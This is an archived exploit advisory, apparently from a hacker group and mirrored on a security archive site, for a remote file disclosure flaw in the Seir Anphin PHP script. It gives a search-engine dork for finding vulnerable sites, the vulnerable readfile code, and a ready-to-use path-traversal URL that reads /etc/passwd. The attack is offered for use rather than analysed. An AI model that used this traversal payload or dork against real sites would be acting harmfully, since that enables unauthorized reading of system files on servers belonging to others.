AOH :: HP Unsorted S :: TB10659.HTM

Seir Anphin (file.php a) Remote File Disclosure Vulnerability



Seir Anphin (file.php a) Remote File Disclosure Vulnerability
Seir Anphin (file.php a) Remote File Disclosure Vulnerability



----------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...



Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1 
Dork:"Powered by Seir Anphin"

Contact: ilker Kandemir 

info:   */Siz Yokken AYYILDIZ Vardi.*/
-----------------------------------------------------------------------------------
Bug:
		exit();
		header("Content-Disposition: attachment; filename=\"$filename\"");
		header('Content-Length: ' . filesize($a['filepath']));
		readfile($a['filepath']);
		exit();

-----------------------------------------------------------------------------------

Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd

-----------------------------------------------------------------------------------


Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.